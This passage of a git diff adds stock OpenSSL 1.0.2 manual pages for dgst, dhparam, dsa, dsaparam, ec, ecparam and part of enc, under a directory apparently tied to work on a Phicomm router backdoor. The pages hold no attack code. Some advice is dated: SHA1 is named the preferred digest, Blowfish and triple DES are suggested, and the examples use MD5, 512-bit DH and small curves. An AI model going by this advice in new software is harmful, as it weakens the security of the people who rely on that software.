+characters only). String length must conform to any restrictions of
+the MAC algorithm for example exactly 32 chars for gost-mac.
+
+=item B<hexkey:string>
+
+Specifies MAC key in hexadecimal form (two hex digits per byte).
+Key length must conform to any restrictions of the MAC algorithm
+for example exactly 32 chars for gost-mac.
+
+=back
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others. 
+
+=item B<-non-fips-allow>
+
+enable use of non-FIPS algorithms such as MD5 even in FIPS mode.
+
+=item B<-fips-fingerprint>
+
+compute HMAC using a specific key
+for certain OpenSSL-FIPS operations.
+
+=item B<file...>
+
+file or files to digest. If no files are specified then standard input is
+used.
+
+=back
+
+
+=head1 EXAMPLES
+
+To create a hex-encoded message digest of a file:
+ openssl dgst -md5 -hex file.txt
+
+To sign a file using SHA-256 with binary file output:
+ openssl dgst -sha256 -sign privatekey.pem -out signature.sign file.txt
+
+To verify a signature:
+ openssl dgst -sha256 -verify publickey.pem \
+ -signature signature.sign \
+ file.txt
+
+
+=head1 NOTES
+
+The digest of choice for all new applications is SHA1. Other digests are
+however still widely used.
+
+When signing a file, B<dgst> will automatically determine the algorithm
+(RSA, ECC, etc) to use for signing based on the private key's ASN.1 info.
+When verifying signatures, it only handles the RSA, DSA, or ECDSA signature
+itself, not the related data to identify the signer and algorithm used in
+formats such as x.509, CMS, and S/MIME.
+
+A source of random numbers is required for certain signing algorithms, in
+particular ECDSA and DSA.
+
+The signing and verify options should only be used if a single file is
+being signed or verified.
+
+Hex signatures cannot be verified using B<openssl>.  Instead, use "xxd -r"
+or similar program to transform the hex signature into a binary signature
+prior to verification.
+
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dhparam.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dhparam.pod
new file mode 100644
index 0000000..6e27cf5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dhparam.pod
@@ -0,0 +1,146 @@
+=pod
+
+=head1 NAME
+
+dhparam - DH parameter manipulation and generation
+
+=head1 SYNOPSIS
+
+B<openssl dhparam>
+[B<-inform DER|PEM>]
+[B<-outform DER|PEM>]
+[B<-in> I<filename>]
+[B<-out> I<filename>]
+[B<-dsaparam>]
+[B<-check>]
+[B<-noout>]
+[B<-text>]
+[B<-C>]
+[B<-2>]
+[B<-5>]
+[B<-rand> I<file(s)>]
+[B<-engine id>]
+[I<numbits>]
+
+=head1 DESCRIPTION
+
+This command is used to manipulate DH parameter files.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option uses an ASN1 DER encoded
+form compatible with the PKCS#3 DHparameter structure. The PEM form is the
+default format: it consists of the B<DER> format base64 encoded with
+additional header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in> I<filename>
+
+This specifies the input filename to read parameters from or standard input if
+this option is not specified.
+
+=item B<-out> I<filename>
+
+This specifies the output filename parameters to. Standard output is used
+if this option is not present. The output filename should B<not> be the same
+as the input filename.
+
+=item B<-dsaparam>
+
+If this option is used, DSA rather than DH parameters are read or created;
+they are converted to DH format.  Otherwise, "strong" primes (such
+that (p-1)/2 is also prime) will be used for DH parameter generation.
+
+DH parameter generation with the B<-dsaparam> option is much faster,
+and the recommended exponent length is shorter, which makes DH key
+exchange more efficient.  Beware that with such DSA-style DH
+parameters, a fresh DH key should be created for each use to
+avoid small-subgroup attacks that may be possible otherwise.
+
+=item B<-check>
+
+check if the parameters are valid primes and generator.
+
+=item B<-2>, B<-5>
+
+The generator to use, either 2 or 5. 2 is the default. If present then the
+input file is ignored and parameters are generated instead.
+
+=item B<-rand> I<file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item I<numbits>
+
+this option specifies that a parameter set should be generated of size
+I<numbits>. It must be the last option. If not present then a value of 512
+is used. If this option is present then the input file is ignored and 
+parameters are generated instead.
+
+=item B<-noout>
+
+this option inhibits the output of the encoded version of the parameters.
+
+=item B<-text>
+
+this option prints out the DH parameters in human readable form.
+
+=item B<-C>
+
+this option converts the parameters into C code. The parameters can then
+be loaded by calling the B<get_dh>I<numbits>B<()> function.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<dhparam>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 WARNINGS
+
+The program B<dhparam> combines the functionality of the programs B<dh> and
+B<gendh> in previous versions of OpenSSL and SSLeay. The B<dh> and B<gendh>
+programs are retained for now but may have different purposes in future 
+versions of OpenSSL.
+
+=head1 NOTES
+
+PEM format DH parameters use the header and footer lines:
+
+ -----BEGIN DH PARAMETERS-----
+ -----END DH PARAMETERS-----
+
+OpenSSL currently only supports the older PKCS#3 DH, not the newer X9.42
+DH.
+
+This program manipulates DH parameters not keys.
+
+=head1 BUGS
+
+There should be a way to generate and manipulate DH keys.
+
+=head1 SEE ALSO
+
+L<dsaparam(1)|dsaparam(1)>
+
+=head1 HISTORY
+
+The B<dhparam> command was added in OpenSSL 0.9.5.
+The B<-dsaparam> option was added in OpenSSL 0.9.6.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dsa.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dsa.pod
new file mode 100644
index 0000000..8bf6cc9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dsa.pod
@@ -0,0 +1,164 @@
+=pod
+
+=head1 NAME
+
+dsa - DSA key processing
+
+=head1 SYNOPSIS
+
+B<openssl> B<dsa>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-passin arg>]
+[B<-out filename>]
+[B<-passout arg>]
+[B<-aes128>]
+[B<-aes192>]
+[B<-aes256>]
+[B<-camellia128>]
+[B<-camellia192>]
+[B<-camellia256>]
+[B<-des>]
+[B<-des3>]
+[B<-idea>]
+[B<-text>]
+[B<-noout>]
+[B<-modulus>]
+[B<-pubin>]
+[B<-pubout>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<dsa> command processes DSA keys. They can be converted between various
+forms and their components printed out. B<Note> This command uses the
+traditional SSLeay compatible format for private key encryption: newer
+applications should use the more secure PKCS#8 format using the B<pkcs8>
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option with a private key uses
+an ASN1 DER encoded form of an ASN.1 SEQUENCE consisting of the values of
+version (currently zero), p, q, g, the public and private key components
+respectively as ASN.1 INTEGERs. When used with a public key it uses a
+SubjectPublicKeyInfo structure: it is an error if the key is not DSA.
+
+The B<PEM> form is the default format: it consists of the B<DER> format base64
+encoded with additional header and footer lines. In the case of a private key
+PKCS#8 format is also accepted.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a key from or standard input if this
+option is not specified. If the key is encrypted a pass phrase will be
+prompted for.
+
+=item B<-passin arg>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-out filename>
+
+This specifies the output filename to write a key to or standard output by
+is not specified. If any encryption options are set then a pass phrase will be
+prompted for. The output filename should B<not> be the same as the input
+filename.
+
+=item B<-passout arg>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-aes128|-aes192|-aes256|-camellia128|-camellia192|-camellia256|-des|-des3|-idea>
+
+These options encrypt the private key with the specified
+cipher before outputting it. A pass phrase is prompted for.
+If none of these options is specified the key is written in plain text. This
+means that using the B<dsa> utility to read in an encrypted key with no
+encryption option can be used to remove the pass phrase from a key, or by
+setting the encryption options it can be use to add or change the pass phrase.
+These options can only be used with PEM format output files.
+
+=item B<-text>
+
+prints out the public, private key components and parameters.
+
+=item B<-noout>
+
+this option prevents output of the encoded version of the key.
+
+=item B<-modulus>
+
+this option prints out the value of the public key component of the key.
+
+=item B<-pubin>
+
+by default a private key is read from the input file: with this option a
+public key is read instead.
+
+=item B<-pubout>
+
+by default a private key is output. With this option a public
+key will be output instead. This option is automatically set if the input is
+a public key.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<dsa>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 NOTES
+
+The PEM private key format uses the header and footer lines:
+
+ -----BEGIN DSA PRIVATE KEY-----
+ -----END DSA PRIVATE KEY-----
+
+The PEM public key format uses the header and footer lines:
+
+ -----BEGIN PUBLIC KEY-----
+ -----END PUBLIC KEY-----
+
+=head1 EXAMPLES
+
+To remove the pass phrase on a DSA private key:
+
+ openssl dsa -in key.pem -out keyout.pem
+
+To encrypt a private key using triple DES:
+
+ openssl dsa -in key.pem -des3 -out keyout.pem
+
+To convert a private key from PEM to DER format: 
+
+ openssl dsa -in key.pem -outform DER -out keyout.der
+
+To print out the components of a private key to standard output:
+
+ openssl dsa -in key.pem -text -noout
+
+To just output the public part of a private key:
+
+ openssl dsa -in key.pem -pubout -out pubkey.pem
+
+=head1 SEE ALSO
+
+L<dsaparam(1)|dsaparam(1)>, L<gendsa(1)|gendsa(1)>, L<rsa(1)|rsa(1)>,
+L<genrsa(1)|genrsa(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dsaparam.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dsaparam.pod
new file mode 100644
index 0000000..ba5ec4d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/dsaparam.pod
@@ -0,0 +1,110 @@
+=pod
+
+=head1 NAME
+
+dsaparam - DSA parameter manipulation and generation
+
+=head1 SYNOPSIS
+
+B<openssl dsaparam>
+[B<-inform DER|PEM>]
+[B<-outform DER|PEM>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-noout>]
+[B<-text>]
+[B<-C>]
+[B<-rand file(s)>]
+[B<-genkey>]
+[B<-engine id>]
+[B<numbits>]
+
+=head1 DESCRIPTION
+
+This command is used to manipulate or generate DSA parameter files.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option uses an ASN1 DER encoded
+form compatible with RFC2459 (PKIX) DSS-Parms that is a SEQUENCE consisting
+of p, q and g respectively. The PEM form is the default format: it consists
+of the B<DER> format base64 encoded with additional header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read parameters from or standard input if
+this option is not specified. If the B<numbits> parameter is included then
+this option will be ignored.
+
+=item B<-out filename>
+
+This specifies the output filename parameters to. Standard output is used
+if this option is not present. The output filename should B<not> be the same
+as the input filename.
+
+=item B<-noout>
+
+this option inhibits the output of the encoded version of the parameters.
+
+=item B<-text>
+
+this option prints out the DSA parameters in human readable form.
+
+=item B<-C>
+
+this option converts the parameters into C code. The parameters can then
+be loaded by calling the B<get_dsaXXX()> function.
+
+=item B<-genkey>
+
+this option will generate a DSA either using the specified or generated
+parameters.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<numbits>
+
+this option specifies that a parameter set should be generated of size
+B<numbits>. It must be the last option. If this option is included then
+the input file (if any) is ignored.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<dsaparam>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 NOTES
+
+PEM format DSA parameters use the header and footer lines:
+
+ -----BEGIN DSA PARAMETERS-----
+ -----END DSA PARAMETERS-----
+
+DSA parameter generation is a slow process and as a result the same set of
+DSA parameters is often used to generate several distinct keys.
+
+=head1 SEE ALSO
+
+L<gendsa(1)|gendsa(1)>, L<dsa(1)|dsa(1)>, L<genrsa(1)|genrsa(1)>,
+L<rsa(1)|rsa(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ec.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ec.pod
new file mode 100644
index 0000000..5c7b45d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ec.pod
@@ -0,0 +1,190 @@
+=pod
+
+=head1 NAME
+
+ec - EC key processing
+
+=head1 SYNOPSIS
+
+B<openssl> B<ec>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-passin arg>]
+[B<-out filename>]
+[B<-passout arg>]
+[B<-des>]
+[B<-des3>]
+[B<-idea>]
+[B<-text>]
+[B<-noout>]
+[B<-param_out>]
+[B<-pubin>]
+[B<-pubout>]
+[B<-conv_form arg>]
+[B<-param_enc arg>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<ec> command processes EC keys. They can be converted between various
+forms and their components printed out. B<Note> OpenSSL uses the 
+private key format specified in 'SEC 1: Elliptic Curve Cryptography'
+(http://www.secg.org/). To convert a OpenSSL EC private key into the
+PKCS#8 private key format use the B<pkcs8> command.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option with a private key uses
+an ASN.1 DER encoded SEC1 private key. When used with a public key it
+uses the SubjectPublicKeyInfo structure as specified in RFC 3280.
+The B<PEM> form is the default format: it consists of the B<DER> format base64
+encoded with additional header and footer lines. In the case of a private key
+PKCS#8 format is also accepted.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a key from or standard input if this
+option is not specified. If the key is encrypted a pass phrase will be
+prompted for.
+
+=item B<-passin arg>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-out filename>
+
+This specifies the output filename to write a key to or standard output by
+is not specified. If any encryption options are set then a pass phrase will be
+prompted for. The output filename should B<not> be the same as the input
+filename.
+
+=item B<-passout arg>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-des|-des3|-idea>
+
+These options encrypt the private key with the DES, triple DES, IDEA or 
+any other cipher supported by OpenSSL before outputting it. A pass phrase is
+prompted for.
+If none of these options is specified the key is written in plain text. This
+means that using the B<ec> utility to read in an encrypted key with no
+encryption option can be used to remove the pass phrase from a key, or by
+setting the encryption options it can be use to add or change the pass phrase.
+These options can only be used with PEM format output files.
+
+=item B<-text>
+
+prints out the public, private key components and parameters.
+
+=item B<-noout>
+
+this option prevents output of the encoded version of the key.
+
+=item B<-modulus>
+
+this option prints out the value of the public key component of the key.
+
+=item B<-pubin>
+
+by default a private key is read from the input file: with this option a
+public key is read instead.
+
+=item B<-pubout>
+
+by default a private key is output. With this option a public
+key will be output instead. This option is automatically set if the input is
+a public key.
+
+=item B<-conv_form>
+
+This specifies how the points on the elliptic curve are converted
+into octet strings. Possible values are: B<compressed> (the default
+value), B<uncompressed> and B<hybrid>. For more information regarding
+the point conversion forms please read the X9.62 standard.
+B<Note> Due to patent issues the B<compressed> option is disabled
+by default for binary curves and can be enabled by defining
+the preprocessor macro B<OPENSSL_EC_BIN_PT_COMP> at compile time.
+
+=item B<-param_enc arg>
+
+This specifies how the elliptic curve parameters are encoded.
+Possible value are: B<named_curve>, i.e. the ec parameters are
+specified by a OID, or B<explicit> where the ec parameters are
+explicitly given (see RFC 3279 for the definition of the 
+EC parameters structures). The default value is B<named_curve>.
+B<Note> the B<implicitlyCA> alternative ,as specified in RFC 3279,
+is currently not implemented in OpenSSL.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<ec>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 NOTES
+
+The PEM private key format uses the header and footer lines:
+
+ -----BEGIN EC PRIVATE KEY-----
+ -----END EC PRIVATE KEY-----
+
+The PEM public key format uses the header and footer lines:
+
+ -----BEGIN PUBLIC KEY-----
+ -----END PUBLIC KEY-----
+
+=head1 EXAMPLES
+
+To encrypt a private key using triple DES:
+
+ openssl ec -in key.pem -des3 -out keyout.pem
+
+To convert a private key from PEM to DER format: 
+
+ openssl ec -in key.pem -outform DER -out keyout.der
+
+To print out the components of a private key to standard output:
+
+ openssl ec -in key.pem -text -noout
+
+To just output the public part of a private key:
+
+ openssl ec -in key.pem -pubout -out pubkey.pem
+
+To change the parameters encoding to B<explicit>:
+
+ openssl ec -in key.pem -param_enc explicit -out keyout.pem
+
+To change the point conversion form to B<compressed>:
+
+ openssl ec -in key.pem -conv_form compressed -out keyout.pem
+
+=head1 SEE ALSO
+
+L<ecparam(1)|ecparam(1)>, L<dsa(1)|dsa(1)>, L<rsa(1)|rsa(1)>
+
+=head1 HISTORY
+
+The ec command was first introduced in OpenSSL 0.9.8.
+
+=head1 AUTHOR
+
+Nils Larsch for the OpenSSL project (http://www.openssl.org).
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ecparam.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ecparam.pod
new file mode 100644
index 0000000..88e9d1e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/ecparam.pod
@@ -0,0 +1,179 @@
+=pod
+
+=head1 NAME
+
+ecparam - EC parameter manipulation and generation
+
+=head1 SYNOPSIS
+
+B<openssl ecparam>
+[B<-inform DER|PEM>]
+[B<-outform DER|PEM>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-noout>]
+[B<-text>]
+[B<-C>]
+[B<-check>]
+[B<-name arg>]
+[B<-list_curves>]
+[B<-conv_form arg>]
+[B<-param_enc arg>]
+[B<-no_seed>]
+[B<-rand file(s)>]
+[B<-genkey>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+This command is used to manipulate or generate EC parameter files.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. The B<DER> option uses an ASN.1 DER encoded
+form compatible with RFC 3279 EcpkParameters. The PEM form is the default
+format: it consists of the B<DER> format base64 encoded with additional 
+header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read parameters from or standard input if
+this option is not specified.
+
+=item B<-out filename>
+
+This specifies the output filename parameters to. Standard output is used
+if this option is not present. The output filename should B<not> be the same
+as the input filename.
+
+=item B<-noout>
+
+This option inhibits the output of the encoded version of the parameters.
+
+=item B<-text>
+
+This option prints out the EC parameters in human readable form.
+
+=item B<-C>
+
+This option converts the EC parameters into C code. The parameters can then
+be loaded by calling the B<get_ec_group_XXX()> function.
+
+=item B<-check>
+
+Validate the elliptic curve parameters.
+
+=item B<-name arg>
+
+Use the EC parameters with the specified 'short' name. Use B<-list_curves>
+to get a list of all currently implemented EC parameters.
+
+=item B<-list_curves>
+
+If this options is specified B<ecparam> will print out a list of all
+currently implemented EC parameters names and exit.
+
+=item B<-conv_form>
+
+This specifies how the points on the elliptic curve are converted
+into octet strings. Possible values are: B<compressed> (the default
+value), B<uncompressed> and B<hybrid>. For more information regarding
+the point conversion forms please read the X9.62 standard.
+B<Note> Due to patent issues the B<compressed> option is disabled
+by default for binary curves and can be enabled by defining
+the preprocessor macro B<OPENSSL_EC_BIN_PT_COMP> at compile time.
+
+=item B<-param_enc arg>
+
+This specifies how the elliptic curve parameters are encoded.
+Possible value are: B<named_curve>, i.e. the ec parameters are
+specified by a OID, or B<explicit> where the ec parameters are
+explicitly given (see RFC 3279 for the definition of the 
+EC parameters structures). The default value is B<named_curve>.
+B<Note> the B<implicitlyCA> alternative ,as specified in RFC 3279,
+is currently not implemented in OpenSSL.
+
+=item B<-no_seed>
+
+This option inhibits that the 'seed' for the parameter generation
+is included in the ECParameters structure (see RFC 3279).
+
+=item B<-genkey>
+
+This option will generate a EC private key using the specified parameters.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<ecparam>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 NOTES
+
+PEM format EC parameters use the header and footer lines:
+
+ -----BEGIN EC PARAMETERS-----
+ -----END EC PARAMETERS-----
+
+OpenSSL is currently not able to generate new groups and therefore
+B<ecparam> can only create EC parameters from known (named) curves. 
+
+=head1 EXAMPLES
+
+To create EC parameters with the group 'prime192v1':
+
+  openssl ecparam -out ec_param.pem -name prime192v1
+
+To create EC parameters with explicit parameters:
+
+  openssl ecparam -out ec_param.pem -name prime192v1 -param_enc explicit
+
+To validate given EC parameters:
+
+  openssl ecparam -in ec_param.pem -check
+
+To create EC parameters and a private key:
+
+  openssl ecparam -out ec_key.pem -name prime192v1 -genkey
+
+To change the point encoding to 'compressed':
+
+  openssl ecparam -in ec_in.pem -out ec_out.pem -conv_form compressed
+
+To print out the EC parameters to standard output:
+
+  openssl ecparam -in ec_param.pem -noout -text
+
+=head1 SEE ALSO
+
+L<ec(1)|ec(1)>, L<dsaparam(1)|dsaparam(1)>
+
+=head1 HISTORY
+
+The ecparam command was first introduced in OpenSSL 0.9.8.
+
+=head1 AUTHOR
+
+Nils Larsch for the OpenSSL project (http://www.openssl.org)
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/enc.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/enc.pod
new file mode 100644
index 0000000..41791ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/enc.pod
@@ -0,0 +1,333 @@
+=pod
+
+=head1 NAME
+
+enc - symmetric cipher routines
+
+=head1 SYNOPSIS
+
+B<openssl enc -ciphername>
+[B<-in filename>]
+[B<-out filename>]
+[B<-pass arg>]
+[B<-e>]
+[B<-d>]
+[B<-a/-base64>]
+[B<-A>]
+[B<-k password>]
+[B<-kfile filename>]
+[B<-K key>]
+[B<-iv IV>]
+[B<-S salt>]
+[B<-salt>]
+[B<-nosalt>]
+[B<-z>]
+[B<-md>]
+[B<-p>]
+[B<-P>]
+[B<-bufsize number>]
+[B<-nopad>]
+[B<-debug>]
+[B<-none>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The symmetric cipher commands allow data to be encrypted or decrypted
+using various block and stream ciphers using keys based on passwords
+or explicitly provided. Base64 encoding or decoding can also be performed
+either by itself or in addition to the encryption or decryption.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+the input filename, standard input by default.
+
+=item B<-out filename>
+
+the output filename, standard output by default.
+
+=item B<-pass arg>
+
+the password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-salt>
+
+use a salt in the key derivation routines. This is the default.
+
+=item B<-nosalt>
+
+don't use a salt in the key derivation routines. This option B<SHOULD NOT> be
+used except for test purposes or compatibility with ancient versions of OpenSSL
+and SSLeay.
+
+=item B<-e>
+
+encrypt the input data: this is the default.
+
+=item B<-d>
+
+decrypt the input data.
+
+=item B<-a>
+
+base64 process the data. This means that if encryption is taking place
+the data is base64 encoded after encryption. If decryption is set then
+the input data is base64 decoded before being decrypted.
+
+=item B<-base64>
+
+same as B<-a>
+
+=item B<-A>
+
+if the B<-a> option is set then base64 process the data on one line.
+
+=item B<-k password>
+
+the password to derive the key from. This is for compatibility with previous
+versions of OpenSSL. Superseded by the B<-pass> argument.
+
+=item B<-kfile filename>
+
+read the password to derive the key from the first line of B<filename>.
+This is for compatibility with previous versions of OpenSSL. Superseded by
+the B<-pass> argument.
+
+=item B<-nosalt>
+
+do not use a salt 
+
+=item B<-salt>
+
+use salt (randomly generated or provide with B<-S> option) when
+encrypting (this is the default).
+
+=item B<-S salt>
+
+the actual salt to use: this must be represented as a string of hex digits.
+
+=item B<-K key>
+
+the actual key to use: this must be represented as a string comprised only
+of hex digits. If only the key is specified, the IV must additionally specified
+using the B<-iv> option. When both a key and a password are specified, the
+key given with the B<-K> option will be used and the IV generated from the
+password will be taken. It probably does not make much sense to specify
+both key and password.
+
+=item B<-iv IV>
+
+the actual IV to use: this must be represented as a string comprised only
+of hex digits. When only the key is specified using the B<-K> option, the
+IV must explicitly be defined. When a password is being specified using
+one of the other options, the IV is generated from this password.
+
+=item B<-p>
+
+print out the key and IV used.
+
+=item B<-P>
+
+print out the key and IV used then immediately exit: don't do any encryption
+or decryption.
+
+=item B<-bufsize number>
+
+set the buffer size for I/O
+
+=item B<-nopad>
+
+disable standard block padding
+
+=item B<-debug>
+
+debug the BIOs used for I/O.
+
+=item B<-z>
+
+Compress or decompress clear text using zlib before encryption or after
+decryption. This option exists only if OpenSSL with compiled with zlib
+or zlib-dynamic option.
+
+=item B<-none>
+
+Use NULL cipher (no encryption or decryption of input).
+
+=back
+
+=head1 NOTES
+
+The program can be called either as B<openssl ciphername> or
+B<openssl enc -ciphername>. But the first form doesn't work with
+engine-provided ciphers, because this form is processed before the
+configuration file is read and any ENGINEs loaded.
+
+Engines which provide entirely new encryption algorithms (such as ccgost
+engine which provides gost89 algorithm) should be configured in the
+configuration file. Engines, specified in the command line using -engine
+options can only be used for hadrware-assisted implementations of
+ciphers, which are supported by OpenSSL core or other engine, specified
+in the configuration file.
+
+When enc command lists supported ciphers, ciphers provided by engines,
+specified in the configuration files are listed too.
+
+A password will be prompted for to derive the key and IV if necessary.
+
+The B<-salt> option should B<ALWAYS> be used if the key is being derived
+from a password unless you want compatibility with previous versions of
+OpenSSL and SSLeay.
+
+Without the B<-salt> option it is possible to perform efficient dictionary
+attacks on the password and to attack stream cipher encrypted data. The reason
+for this is that without the salt the same password always generates the same
+encryption key. When the salt is being used the first eight bytes of the
+encrypted data are reserved for the salt: it is generated at random when
+encrypting a file and read from the encrypted file when it is decrypted.
+
+Some of the ciphers do not have large keys and others have security
+implications if not used correctly. A beginner is advised to just use
+a strong block cipher in CBC mode such as bf or des3.
+
+All the block ciphers normally use PKCS#5 padding also known as standard block
+padding: this allows a rudimentary integrity or password check to be
+performed. However since the chance of random data passing the test is
+better than 1 in 256 it isn't a very good test.
+
+If padding is disabled then the input data must be a multiple of the cipher
+block length.
+
+All RC2 ciphers have the same key and effective key length.
+
+Blowfish and RC5 algorithms use a 128 bit key.
+
+=head1 SUPPORTED CIPHERS
+
+Note that some of these ciphers can be disabled at compile time
+and some are available only if an appropriate engine is configured
+in the configuration file. The output of the B<enc> command run with
+unsupported options (for example B<openssl enc -help>) includes a
+list of ciphers, supported by your versesion of OpenSSL, including
+ones provided by configured engines.
+
+The B<enc> program does not support authenticated encryption modes
+like CCM and GCM. The utility does not store or retrieve the
+authentication tag.
+
+
+ base64             Base 64
+
+ bf-cbc             Blowfish in CBC mode
+ bf                 Alias for bf-cbc
+ bf-cfb             Blowfish in CFB mode
+ bf-ecb             Blowfish in ECB mode
+ bf-ofb             Blowfish in OFB mode
+
+ cast-cbc           CAST in CBC mode
+ cast               Alias for cast-cbc
+ cast5-cbc          CAST5 in CBC mode
+ cast5-cfb          CAST5 in CFB mode
+ cast5-ecb          CAST5 in ECB mode
+ cast5-ofb          CAST5 in OFB mode
+
+ des-cbc            DES in CBC mode
+ des                Alias for des-cbc
+ des-cfb            DES in CBC mode
+ des-ofb            DES in OFB mode
+ des-ecb            DES in ECB mode
+
+ des-ede-cbc        Two key triple DES EDE in CBC mode
+ des-ede            Two key triple DES EDE in ECB mode
+ des-ede-cfb        Two key triple DES EDE in CFB mode
+ des-ede-ofb        Two key triple DES EDE in OFB mode
+
+ des-ede3-cbc       Three key triple DES EDE in CBC mode
+ des-ede3           Three key triple DES EDE in ECB mode
+ des3               Alias for des-ede3-cbc
+ des-ede3-cfb       Three key triple DES EDE CFB mode
+ des-ede3-ofb       Three key triple DES EDE in OFB mode
+
+ desx               DESX algorithm.
+
+ gost89             GOST 28147-89 in CFB mode (provided by ccgost engine)
+ gost89-cnt        `GOST 28147-89 in CNT mode (provided by ccgost engine) 
+
+ idea-cbc           IDEA algorithm in CBC mode
+ idea               same as idea-cbc
